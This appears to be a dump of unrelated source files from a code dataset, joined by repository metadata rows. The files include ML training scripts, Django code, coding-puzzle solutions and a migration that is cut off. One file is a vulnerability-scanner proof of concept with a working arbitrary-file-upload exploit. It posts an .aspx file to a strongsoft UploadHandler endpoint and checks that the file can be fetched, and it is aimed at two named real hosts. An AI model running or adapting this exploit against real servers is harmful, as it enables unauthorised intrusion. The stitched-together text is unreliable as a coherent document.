sigmoid = torch.sigmoid(next_sentence)
re_label = (label == 0).float()
p = (re_label - sigmoid) * (re_label - label)
# focal_factor=(1-p)**2
loss_matrix = -torch.log(p) # *focal_factor
loss = torch.mean(loss_matrix)
"""""
softmax=self.softmax(next_sentence)
p=softmax[label==1]
print(p)
pos_matrix=-torch.log(p)
loss=torch.mean(pos_matrix)
"""""
return loss
# Performs one step of SGD.
def numpy_sdg_step(self, batch, optimizer, lrate, dropout):
# Calculate the gradients
optimizer.zero_grad()
loss = self.bptt(torch.tensor(batch[0]).to(device).long(), torch.tensor(batch[1]).to(device).float(),
torch.tensor(batch[2]).to(device).long(), torch.tensor(batch[3]).to(device).long(),
torch.tensor(batch[4]).to(device).float(), dropout)
loss.backward()
optimizer.step()
# optimizer.param_groups[0]['lr'] = lrate
return loss
def train_with_batch(self, info, batch_val, optimizer):
val_precision = []
Loss_len = 0
num_examples_seen = 1
# nepoch=nb_epoch()
nepoch = 1000
print('training epoch :', nepoch)
print('lengh of batch :', int(len(info[0]) / SEN_LEN))
for epoch in range(nepoch):
epoch=epoch
print("에폭", epoch + 1)
batch_train = generate_batch(info[0], info[1], info[2], info[3])
for i in range(len(batch_train)):
batch_loc_text, batch_img, batch_know, segment, batch_y, true_label = batch_train[i]
# print(np.shape(batch_know)) # [batch_size, cat_num]
# 3factors or 4factors
lrate = math.pow(64, -0.5) * min(math.pow(num_examples_seen, -0.5), num_examples_seen * math.pow(4000,
-1.5)) # warm up step : default 4000
loss = self.numpy_sdg_step((batch_loc_text, batch_img, batch_know, segment, batch_y), optimizer,
lrate, True)
self.Loss += loss.item()
Loss_len += 1
if num_examples_seen % 1000 == 0: # origin = int(batch_len * nepoch / 100)
time_ = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print(time_, ' ', int(100 * num_examples_seen / (len(batch_train) * nepoch)), end='')
print('% 완료!!!', end='')
print(' loss :', self.Loss / Loss_len) # , ' lr :', lrate)
self.Loss = 0
Loss_len = 0
num_examples_seen += 1
print('Epoch', epoch + 1, 'completed out of', nepoch)
# valid set : 8104개
val_pred = []
val_truth = []
for i in range(len(batch_val)):
model.eval()
batch_loc_text, batch_img, batch_know, segment, batch_y, true_label = batch_val[i]
val_prob = self.softmax(
self.forward(torch.tensor(batch_loc_text).to(device).long(), torch.tensor(batch_img).to(device).float(),
torch.tensor(batch_know).to(device).long(), torch.tensor(segment).to(device).long(), False))
# if last_function() == "softmax":
y_pred = np.argsort(val_prob.detach().cpu().numpy(), axis=1)
for i in range(y_pred.shape[0]):
val_pred.append(y_pred[i])
val_truth.append(true_label[i])
precision = top1_acc(val_truth, val_pred)
print("Epoch:", (epoch + 1), "val_precision:", precision)
val_precision.append(precision)
torch.save({
'epoch': epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'num_examples_seen' : num_examples_seen
}, 'project3_bert23_checkpoint/epoch='+str(epoch))
return val_precision
def max_length(list):
max = 0
for i in list:
if max < len(i):
max = len(i)
return max
SEN_LEN = 5
# Train on a small subset of the data to see what happens
def generate_batch(new_loc_text_list, new_loc_list, data, len_hashtag):
batch = []
temp_loc_text = []
temp_seg=[]
temp_img = []
temp_know = []
temp_y = []
temp_y_ = []
random.shuffle(new_loc_text_list)
key = new_loc_text_list
k = max_length(key[:SEN_LEN]) - 1
if k > 512:
k = 512
max_num_sen = SEN_LEN
num_sen = 0
total_num_sen = 0
for i in key:
loc_data=new_loc_list[i[0]][1:]
loc_text_seg=[0]*len(loc_data)+[1]*(k-len(loc_data))
temp_seg.append(loc_text_seg)
loc_text_data=i[1:]
if len(loc_text_data) <= k:
temp_loc_text.append( loc_text_data+ [tokenizer.pad_token_id] * (k - len(loc_text_data)))
else:
# print('error')
temp_loc_text.append(loc_text_data[:511] + [tokenizer.sep_token_id])
temp_img.append(data[0][i[0]])
temp_know.append(data[4][i[0]])
one_hot_y = []
for j in range(len_hashtag):
if j in data[3][i[0]]:
one_hot_y.append(1)
else:
one_hot_y.append(0)
temp_y.append(one_hot_y)
temp_y_.append(data[3][i[0]])
num_sen += 1
total_num_sen += 1
if num_sen == max_num_sen:
if total_num_sen >= len(key):
break
k = max_length(key[total_num_sen:total_num_sen + SEN_LEN]) - 1
if k > 512:
k = 512
max_num_sen = SEN_LEN
num_sen = 0
batch.append((temp_loc_text, temp_img, temp_know, temp_seg, temp_y, temp_y_))
temp_loc_text = []
temp_seg = []
temp_img = []
temp_know = []
temp_y = []
temp_y_ = []
batch.append((temp_loc_text, temp_img, temp_know, temp_seg, temp_y, temp_y_))
return batch
if __name__ == '__main__':
print("co-attention_" + evaluation_factor())
if evaluation_factor() == '1factor':
print("factor:", which_factor())
if evaluation_factor() == '2factors' or evaluation_factor() == '3factors':
print("connection:", connection())
print("last function:", last_function())
print("current working directory:", os.getcwd())
print('loading data...')
with open("project3_data/vocabulary_keras_h.pkl", "rb") as f:
data = pickle.load(f)
vocabulary = data[0]
hashtagVoc = data[2]
vocabulary_inv = {}
hashtagVoc_inv = {}
hashtagCount = {}
for k, v in vocabulary.items():
vocabulary[k] = v + 2
vocabulary["<Padding>"] = 0
vocabulary['<CLS>'] = 1
vocabulary['<SEP>'] = 2
for i in vocabulary.keys():
vocabulary_inv[vocabulary[i]] = i
for i in hashtagVoc.keys():
hashtagVoc_inv[hashtagVoc[i]] = i
hashtagCount[hashtagVoc[i]] = []
print("vocabulary 스펙:", len(vocabulary), max(vocabulary.values()), min(vocabulary.values()))
print("hashtagVoc 스펙 :", len(hashtagVoc), max(hashtagVoc.values()), min(hashtagVoc.values()))
print("len(hashtagVoc_inv)", len(hashtagVoc_inv))
# Knowledge-base 추가
k_train, k_val, k_test = load_k()
print(len(k_train), len(k_val), len(k_test))
################################# for padding, cls, sep ########################################################
for index, categories in enumerate(k_train):
temp_category = []
for category in categories:
temp_category.append(category + 2)
temp_category.append(2)
k_train[index] = temp_category
for index, categories in enumerate(k_val):
temp_category = []
for category in categories:
temp_category.append(category + 2)
temp_category.append(2)
k_val[index] = temp_category
for index, categories in enumerate(k_test):
temp_category = []
for category in categories:
temp_category.append(category + 2)
temp_category.append(2)
k_test[index] = temp_category
####################################################################################################################
val_data = []
val_data.append(np.load("project3_transformer_data/transformer_image_90_val.npy"))
print("validation data loading finished.")
with open("project3_data/val_tlh_keras_h.bin", "rb") as f:
val_data.extend(pickle.load(f))
print("validation data 업로드")
new_val_text_list = []
for index, sentece in enumerate(val_data[1]):
temp_sen_ = []
for word in sentece:
if word == 0:
pass
else:
temp_sen_.append(word + 2)
temp_sen_ = [tokenizer.sep_token_id]+tokenizer.encode(' '.join([vocabulary_inv[j] for j in temp_sen_]))+[tokenizer.sep_token_id]
new_val_text_list.append(temp_sen_)
new_val_loc_list = []
for index, sentence in enumerate(val_data[2][:, -17:]):
temp_sen = []
for word in sentence:
if word == 0:
pass
else:
temp_sen.append(word + 2)
temp_sen=[tokenizer.cls_token_id]+tokenizer.encode(' '.join([vocabulary_inv[j] for j in temp_sen]))+[tokenizer.sep_token_id]
temp_sen.insert(0, index)
new_val_loc_list.append(temp_sen)
new_val_loc_text_list=[]
for x, y in zip(new_val_loc_list, new_val_text_list):
new_val_loc_text_list.append(x+y[1:])
val_data.append(k_val)
print(len(val_data[0]), len(val_data[1]), len(val_data[2]), len(val_data[3]), len(val_data[4]))
# val_data = check_hashzero(val_data)
# print("check 완")
test_data = []
test_data.append(np.load("project3_transformer_data/transformer_image_90_test.npy"))
print("test data loading finished.")
with open("project3_data/test_tlh_keras_h.bin", "rb") as f:
test_data.extend(pickle.load(f))
print("test data 업로드")
new_test_text_list = []
for index, sentece in enumerate(test_data[1]):
temp_sen_ = []
for word in sentece:
if word == 0:
pass
else:
temp_sen_.append(word + 2)
temp_sen_ = [tokenizer.sep_token_id]+tokenizer.encode(' '.join([vocabulary_inv[j] for j in temp_sen_]))+[tokenizer.sep_token_id]
new_test_text_list.append(temp_sen_)
new_test_loc_list = []
for index, sentece in enumerate(test_data[2][:, -17:]):
temp_sen = []
for word in sentece:
if word == 0:
pass
else:
temp_sen.append(word + 2)
temp_sen=[tokenizer.cls_token_id]+tokenizer.encode(' '.join([vocabulary_inv[j] for j in temp_sen]))+[tokenizer.sep_token_id]
temp_sen.insert(0, index)
new_test_loc_list.append(temp_sen)
new_test_loc_text_list = []
for x, y in zip(new_test_loc_list, new_test_text_list):
new_test_loc_text_list.append(x+y[1:])
test_data.append(k_test)
print(len(test_data[0]), len(test_data[1]), len(test_data[2]), len(test_data[3]), len(test_data[4]))
# test_data = check_hashzero(test_data)
# print("check 완")
train_data = []
train_data.append(np.load("project3_transformer_data/transformer_image_90_train.npy"))
print("train data loading finished.")
# with open("./project3_data/train_tlh_keras_h.bin", "rb") as f:
with open("project3_data/train_tlh_keras_h.bin", "rb") as f:
train_data.extend(pickle.load(f))
print("train data 업로드")
############################################################################
batch_val = generate_batch(new_val_loc_text_list, new_val_loc_list, val_data, len(hashtagVoc))
batch_test = generate_batch(new_test_loc_text_list, new_test_loc_list, test_data, len(hashtagVoc))
############################################################################
new_train_text_list = []
for index, sentece in enumerate(train_data[1]):
temp_sen_ = []
for word in sentece:
if word == 0:
pass
else:
temp_sen_.append(word + 2)
temp_sen_ = [tokenizer.sep_token_id]+tokenizer.encode(' '.join([vocabulary_inv[j] for j in temp_sen_]))+[tokenizer.sep_token_id]
new_train_text_list.append(temp_sen_)
new_train_loc_list = []
for index, sentence in enumerate(train_data[2][:, -17:]):
temp_sen = []
for word in sentence:
if word == 0:
pass
else:
temp_sen.append(word + 2)
temp_sen = [tokenizer.cls_token_id]+tokenizer.encode(' '.join([vocabulary_inv[j] for j in temp_sen]))+[tokenizer.sep_token_id]
temp_sen.insert(0, index)
new_train_loc_list.append(temp_sen)
new_train_loc_text_list = []
for x, y in zip(new_train_loc_list, new_train_text_list):
new_train_loc_text_list.append(x+y[1:])
train_data.append(k_train)
print(len(train_data[0]), len(train_data[1]), len(train_data[2]), len(train_data[3]))
print("train data size: ", len(train_data[3]))
text_maxlen = len(train_data[1][0]) # 411 맞는지 확인
loc_maxlen = len(train_data[2][0]) # 19
print("text_maxlen:", text_maxlen)
print("loc_maxlen:", loc_maxlen)
vocab_size = len(vocabulary_inv) # 26210
hashtag_size = len(hashtagVoc_inv) # 2988
print('-')
print('Vocab size:', vocab_size, 'unique words')
print('Hashtag size:', hashtag_size, 'unique hashtag')
for index, taglist in enumerate(train_data[3]):
for tag in taglist:
hashtagCount[int(tag)].append(index)
cnt = 0
for i in list(hashtagCount.keys()):
if len(hashtagCount[i]) == 0:
del hashtagCount[i]
hashtagCount_saved = copy.deepcopy(hashtagCount)
torch.manual_seed(10)
model = BERTLM_new(vocab_size).to(device)
optimizer = torch.optim.Adam(model.parameters(), betas=(0.9, 0.999), eps=1e-9, lr=1e-5)
print("starts training...")
val_precision = model.train_with_batch((new_train_loc_text_list, new_train_loc_list, train_data, len(hashtagVoc)), batch_val, optimizer)
print("\ntop1 결과 정리")
print("validation")
for i in range(len(val_precision)):
print("epoch", i + 1, "- precision:", val_precision[i])
# print("attention vector weights")
# print_order = ["i_w_it", "i_w_il", "i_w_ik", "t_w_it", "t_w_lt", "t_w_tk", "l_w_lt",
# "l_w_il", "l_w_lk", "k_w_ik", "k_w_tk", "k_w_lk"]
# print(attention_weights)
# with open("./result_weight/" + evaluation_factor() + ".txt", "w") as ff:
# ff.write("순서대로 i_w_it, i_w_il, i_w_ik, t_w_it, t_w_lt, t_w_tk, l_w_lt, l_w_il, l_w_lk, k_w_ik, k_w_tk, k_w_lk")
# for q in range(len(attention_weights)):
# ff.write(print_order[q] + " : " + str(attention_weights[q]) + "\n")
# with open("./result_weight/" + evaluation_factor() + ".bin", "wb") as ff:
# pickle.dump(attention_weights, ff)
#
| [
"[email protected]"
] | |
c74f7972df03e772c45471dfc507ca6f5efa0d51 | e0c8662a56d89730043146ddc340e9e0b9f7de72 | /plugin/118a320c-1596.py | 3205edb6500e7b3aae3542131bb1317f8a8cac3c | [] | no_license | izj007/bugscan_poc | f2ef5903b30b15c230b292a1ff2dc6cea6836940 | 4490f3c36d4033bdef380577333722deed7bc758 | refs/heads/master | 2020-09-22T17:20:50.408078 | 2019-01-18T09:42:47 | 2019-01-18T09:42:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,609 | py | #coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
#__Author__ = treeoph
import re,urlparse
def assign(service, arg):
if service=='strongsoft':
return True,arg
def audit(arg):
p=urlparse.urlparse(arg)
raw='''POST /SysManage/AjaxHandler/UploadHandler.ashx HTTP/1.1
Host: {netloc}
Content-Length: 1305
Origin: {scheme}://{netloc}
X-Requested-With: ShockwaveFlash/20.0.0.267
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: multipart/form-data; boundary=----------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Accept: */*
Referer: {scheme}://{netloc}/CommonReport/TableList.aspx?TableDBID=1009&pagetype=page&menuid=136
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="Filename"
test.aspx
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="GetFileName"
y
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="DataType"
UploadFile
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="GetFileInfo"
y
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="UploadFolder"
/CommonReport/
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="fileext"
*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.mpp;*.vsd;*.jpg;*.png;*.gif;*.bmp
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="TCID"
1009
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="folder"
/CommonReport/UploadFile
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="Filedata"; filename="test.aspx"
Content-Type: application/octet-stream
GIF89a
testvul
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="Upload"
Submit Query
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4--'''
code,head,res,errcode, _=curl.curl2(arg+'SysManage/AjaxHandler/UploadHandler.ashx',raw=raw.format(scheme=p.scheme,netloc=p.netloc))
if code == 200 and res:
m=re.search(r'([\w\/\d]+\.aspx)',res)
if m:
file_url='http://%s/%s'%(p.netloc,m.group())
code,head,res,errcode, _=curl.curl2(file_url)
if 'testvul' in res:
security_hole("Upload File at "+file_url)
if __name__=='__main__':
from dummy import *
audit(assign('strongsoft','http://www.hzwr.gov.cn:8080/')[1])
audit(assign('strongsoft','http://60.191.198.109:8060/')[1]) | [
"[email protected]"
] | |
6ae7560c7fe931a9cb233dbb80213d11ee6f4c7f | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p04001/s207133170.py | 880c6edc03d8bb2cff7f1a58a4507040bed759aa | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 701 | py | S = input()
# TODO: 再帰関数でリストを作成 [s1, "+", s2, s3, "+", s4]とか
result = []
def dfs(i, list):
if i == len(S):
result.append(list)
return
else:
if i == len(S) - 1:
return dfs(i+1, list+[S[i]])
else:
return dfs(i+1, list+[S[i]]), dfs(i+1, list+[S[i], "+"])
# TODO: リストに従って和を計算
dfs(0, [])
ans = 0
for l in result:
sum_of_l = 0
sequence = 0
for id in range(len(l)):
if l[id] == "+":
sum_of_l += sequence
sequence = 0
else:
sequence *= 10
sequence += int(l[id])
sum_of_l += sequence
ans += sum_of_l
print(ans)
| [
"[email protected]"
] | |
58c0b95d752a1cb35fe77a104190da67ab2925e7 | f6ea25823706fe7db053b69639c57431ffc7c8be | /Datacademy/venv/bin/pip | 5c7c8fd81e8f939cc5339c0a391c385f819336c4 | [] | no_license | BobbyJoeSmith3/Week10Hacks | 6f57d34a16a01c6a019730539257910b878eef11 | 43aba9b979bc26ec118eb4af4b0d0149ee87461c | refs/heads/master | 2021-01-18T13:42:34.055202 | 2014-06-26T15:36:50 | 2014-06-26T15:36:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | #!/home/bobbyjoesmith/Training/Week10/Week10Hacks/Datacademy/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
709eb35365d3a06bd9f24087e46777e7a7b37dee | 2b255d07420114c40f6c8aeb0fb25228588282ed | /sitecomber/apps/config/management/commands/crawl_page.py | f50bc927ac3a48312f85620262611ccad9a81b10 | [] | no_license | ninapavlich/sitecomber | b48b3ee055dac1f419c98f08fffe5e9dc44bd6e3 | 6f34e5bb96ca4c119f98ee90c88881e8ca3f6f06 | refs/heads/master | 2022-12-11T20:55:07.215804 | 2020-03-13T07:58:28 | 2020-03-13T07:58:28 | 197,045,165 | 1 | 0 | null | 2022-12-08T01:47:52 | 2019-07-15T17:42:31 | JavaScript | UTF-8 | Python | false | false | 1,015 | py | import logging
from django.core.management.base import BaseCommand
from django.core.exceptions import ObjectDoesNotExist
from sitecomber.apps.results.models import PageResult
logger = logging.getLogger('django')
class Command(BaseCommand):
"""
Example Usage:
Load and parse page result with primary key 1:
python manage.py crawl_page 1
"""
help = 'Crawl Site'
def add_arguments(self, parser):
parser.add_argument('page_result_pk', nargs='+', type=int)
def handle(self, *args, **options):
page_result_pk = int(options['page_result_pk'][0])
logger.info("Going to load page %s" % (page_result_pk))
try:
page = PageResult.objects.get(pk=page_result_pk)
except ObjectDoesNotExist:
logger.error(u"Could not find page result with primary key = %s" % (page_result_pk))
return
page.load()
tests = page.site_domain.site.tests
for test in tests:
test.page_parsed(page)
| [
"[email protected]"
] | |
626a4d10d7b29271ed92d511a73c67b98affecb1 | bf8f377422db9954b81cc44259f0450f7799541d | /pawn_stars/wsgi.py | 7db541520d3b5221158eb09ea6282ea4bf8a8fdb | [
"MIT"
] | permissive | team-pawn-stars/PawnStars-Backend | c7acaaa10fa2f40f77822e5a99af0a9890797471 | b1ea9d29adea65b3004555386b51e488460d1b30 | refs/heads/master | 2020-05-04T13:55:34.080903 | 2019-06-13T12:59:55 | 2019-06-13T12:59:55 | 179,179,127 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | """
WSGI config for pawn_stars project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pawn_stars.settings")
application = get_wsgi_application()
| [
"[email protected]"
] | |
e8dd6a42a1f6eb6d94cefb986c43a7cd569be71b | 48e08c7d5856c35492500b6b01d3d72a31f58ffc | /Leetcode/0051-0100/0086-partition-list.py | 74ffde18be275050ee72f79c301933fb36d60ee1 | [
"MIT"
] | permissive | MiKueen/Data-Structures-and-Algorithms | 8d8730e539e1c112cbd4a51beae9e1c3e2184e63 | 8788bde5349f326aac0267531f39ac7a2a708ee6 | refs/heads/master | 2021-07-18T17:16:39.948239 | 2020-09-13T15:44:37 | 2020-09-13T15:44:37 | 212,309,543 | 0 | 1 | MIT | 2019-10-06T16:24:43 | 2019-10-02T10:19:07 | Python | UTF-8 | Python | false | false | 1,079 | py | '''
Author : MiKueen
Level : Medium
Problem Statement : Partition List
Given a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x.
You should preserve the original relative order of the nodes in each of the two partitions.
Example:
Input: head = 1->4->3->2->5->2, x = 3
Output: 1->2->2->4->3->5
'''
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def partition(self, head, x):
"""
:type head: ListNode
:type x: int
:rtype: ListNode
"""
left = left_head = ListNode(0)
right = right_head = ListNode(0)
while head:
if head.val < x:
left.next = head
left = left.next
else:
right.next = head
right = right.next
head = head.next
right.next = None
left.next = right_head.next
return left_head.next
| [
"[email protected]"
] | |
684022b71ef0d7261d8e43295a62ebc0b0fd84be | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/BichenWuUCB_squeezeDet/squeezeDet-master/src/nets/resnet50_convDet.py | b1d4cde60ed5f428dd7949a8c1ad08f053b0b4cf | [] | no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 6,835 | py | # Author: Bichen Wu ([email protected]) 08/25/2016
"""ResNet50+ConvDet model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import joblib
from utils import util
from easydict import EasyDict as edict
import numpy as np
import tensorflow as tf
from nn_skeleton import ModelSkeleton
class ResNet50ConvDet(ModelSkeleton):
def __init__(self, mc, gpu_id):
with tf.device('/gpu:{}'.format(gpu_id)):
ModelSkeleton.__init__(self, mc)
self._add_forward_graph()
self._add_interpretation_graph()
self._add_loss_graph()
self._add_train_graph()
self._add_viz_graph()
def _add_forward_graph(self):
"""NN architecture."""
mc = self.mc
if mc.LOAD_PRETRAINED_MODEL:
assert tf.gfile.Exists(mc.PRETRAINED_MODEL_PATH), \
'Cannot find pretrained model at the given path:' \
' {}'.format(mc.PRETRAINED_MODEL_PATH)
self.caffemodel_weight = joblib.load(mc.PRETRAINED_MODEL_PATH)
conv1 = self._conv_bn_layer(
self.image_input, 'conv1', 'bn_conv1', 'scale_conv1', filters=64,
size=7, stride=2, freeze=True, conv_with_bias=True)
pool1 = self._pooling_layer(
'pool1', conv1, size=3, stride=2, padding='VALID')
with tf.variable_scope('conv2_x') as scope:
with tf.variable_scope('res2a'):
branch1 = self._conv_bn_layer(
pool1, 'res2a_branch1', 'bn2a_branch1', 'scale2a_branch1',
filters=256, size=1, stride=1, freeze=True, relu=False)
branch2 = self._res_branch(
pool1, layer_name='2a', in_filters=64, out_filters=256,
down_sample=False, freeze=True)
res2a = tf.nn.relu(branch1+branch2, 'relu')
with tf.variable_scope('res2b'):
branch2 = self._res_branch(
res2a, layer_name='2b', in_filters=64, out_filters=256,
down_sample=False, freeze=True)
res2b = tf.nn.relu(res2a+branch2, 'relu')
with tf.variable_scope('res2c'):
branch2 = self._res_branch(
res2b, layer_name='2c', in_filters=64, out_filters=256,
down_sample=False, freeze=True)
res2c = tf.nn.relu(res2b+branch2, 'relu')
with tf.variable_scope('conv3_x') as scope:
with tf.variable_scope('res3a'):
branch1 = self._conv_bn_layer(
res2c, 'res3a_branch1', 'bn3a_branch1', 'scale3a_branch1',
filters=512, size=1, stride=2, freeze=True, relu=False)
branch2 = self._res_branch(
res2c, layer_name='3a', in_filters=128, out_filters=512,
down_sample=True, freeze=True)
res3a = tf.nn.relu(branch1+branch2, 'relu')
with tf.variable_scope('res3b'):
branch2 = self._res_branch(
res3a, layer_name='3b', in_filters=128, out_filters=512,
down_sample=False, freeze=True)
res3b = tf.nn.relu(res3a+branch2, 'relu')
with tf.variable_scope('res3c'):
branch2 = self._res_branch(
res3b, layer_name='3c', in_filters=128, out_filters=512,
down_sample=False, freeze=True)
res3c = tf.nn.relu(res3b+branch2, 'relu')
with tf.variable_scope('res3d'):
branch2 = self._res_branch(
res3c, layer_name='3d', in_filters=128, out_filters=512,
down_sample=False, freeze=True)
res3d = tf.nn.relu(res3c+branch2, 'relu')
with tf.variable_scope('conv4_x') as scope:
with tf.variable_scope('res4a'):
branch1 = self._conv_bn_layer(
res3d, 'res4a_branch1', 'bn4a_branch1', 'scale4a_branch1',
filters=1024, size=1, stride=2, relu=False)
branch2 = self._res_branch(
res3d, layer_name='4a', in_filters=256, out_filters=1024,
down_sample=True)
res4a = tf.nn.relu(branch1+branch2, 'relu')
with tf.variable_scope('res4b'):
branch2 = self._res_branch(
res4a, layer_name='4b', in_filters=256, out_filters=1024,
down_sample=False)
res4b = tf.nn.relu(res4a+branch2, 'relu')
with tf.variable_scope('res4c'):
branch2 = self._res_branch(
res4b, layer_name='4c', in_filters=256, out_filters=1024,
down_sample=False)
res4c = tf.nn.relu(res4b+branch2, 'relu')
with tf.variable_scope('res4d'):
branch2 = self._res_branch(
res4c, layer_name='4d', in_filters=256, out_filters=1024,
down_sample=False)
res4d = tf.nn.relu(res4c+branch2, 'relu')
with tf.variable_scope('res4e'):
branch2 = self._res_branch(
res4d, layer_name='4e', in_filters=256, out_filters=1024,
down_sample=False)
res4e = tf.nn.relu(res4d+branch2, 'relu')
with tf.variable_scope('res4f'):
branch2 = self._res_branch(
res4e, layer_name='4f', in_filters=256, out_filters=1024,
down_sample=False)
res4f = tf.nn.relu(res4e+branch2, 'relu')
dropout4 = tf.nn.dropout(res4f, self.keep_prob, name='drop4')
num_output = mc.ANCHOR_PER_GRID * (mc.CLASSES + 1 + 4)
self.preds = self._conv_layer(
'conv5', dropout4, filters=num_output, size=3, stride=1,
padding='SAME', xavier=False, relu=False, stddev=0.0001)
def _res_branch(
self, inputs, layer_name, in_filters, out_filters, down_sample=False,
freeze=False):
"""Residual branch constructor.
Args:
inputs: input tensor
layer_name: layer name
in_filters: number of filters in XX_branch2a and XX_branch2b layers.
out_filters: number of filters in XX_branch2clayers.
donw_sample: if true, down sample the input feature map
freeze: if true, do not change parameters in this layer
Returns:
A residual branch output operation.
"""
with tf.variable_scope('res'+layer_name+'_branch2'):
stride = 2 if down_sample else 1
output = self._conv_bn_layer(
inputs,
conv_param_name='res'+layer_name+'_branch2a',
bn_param_name='bn'+layer_name+'_branch2a',
scale_param_name='scale'+layer_name+'_branch2a',
filters=in_filters, size=1, stride=stride, freeze=freeze)
output = self._conv_bn_layer(
output,
conv_param_name='res'+layer_name+'_branch2b',
bn_param_name='bn'+layer_name+'_branch2b',
scale_param_name='scale'+layer_name+'_branch2b',
filters=in_filters, size=3, stride=1, freeze=freeze)
output = self._conv_bn_layer(
output,
conv_param_name='res'+layer_name+'_branch2c',
bn_param_name='bn'+layer_name+'_branch2c',
scale_param_name='scale'+layer_name+'_branch2c',
filters=out_filters, size=1, stride=1, freeze=freeze, relu=False)
return output
| [
"[email protected]"
] | |
7fa896bdd5e866fa37b79413b77428eca5f260da | 8a1144dd38388992c7e35a4cc84002e381f2cf1f | /python/django_fundamentals/main3/apps/third_app/models.py | ef165f7feabe4f6b980f5a16ea9002f10e11ff54 | [] | no_license | vin792/dojo_assignments | 18472e868610bacbd0b5141a5322628f4afefb5b | 449b752f92df224285bfd5d03901a3692a98562e | refs/heads/master | 2021-01-20T00:20:09.896742 | 2017-05-26T17:37:09 | 2017-05-26T17:37:09 | 82,735,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 322 | py | from __future__ import unicode_literals
from django.db import models
# Create your models here.
class People(models.Model):
first_name = models.CharField(max_length=30)
last_name = models.CharField(max_length= 30)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True) | [
"[email protected]"
] | |
ba298290ffb40d5dda804815a82833564aff7427 | 73036231277447340ce6ac8cf08fa5aab9772778 | /libreria/libreria/static/img/django-cities-light-2.0.7/django-cities-light-2.0.7/cities_light/migrations/0012_set_display_name.py | e74659676bac3c57ec48aeec83ee56f96928836b | [
"MIT"
] | permissive | jesusmaherrera/books_library | 68f23e2352644df66f92d9e37baf274486984bed | c621f86aa2f8000c13371aea2b000a9bd8965fa1 | refs/heads/master | 2021-01-13T02:06:24.579310 | 2013-02-06T03:21:16 | 2013-02-06T03:21:16 | 5,944,653 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,926 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
for region in orm['cities_light.Region'].objects.all():
region.display_name = u'%s, %s' % (
region.name, region.country.name)
region.save()
for city in orm['cities_light.City'].objects.all():
if city.region_id:
city.display_name = u'%s, %s, %s' % (
city.name, city.region.name, city.country.name)
else:
city.display_name = u'%s, %s' % (
city.name, city.country.name)
city.save()
def backwards(self, orm):
"Write your backwards methods here."
models = {
'cities_light.city': {
'Meta': {'unique_together': "(('region', 'name'),)", 'object_name': 'City'},
'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cities_light.Country']"}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'geoname_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
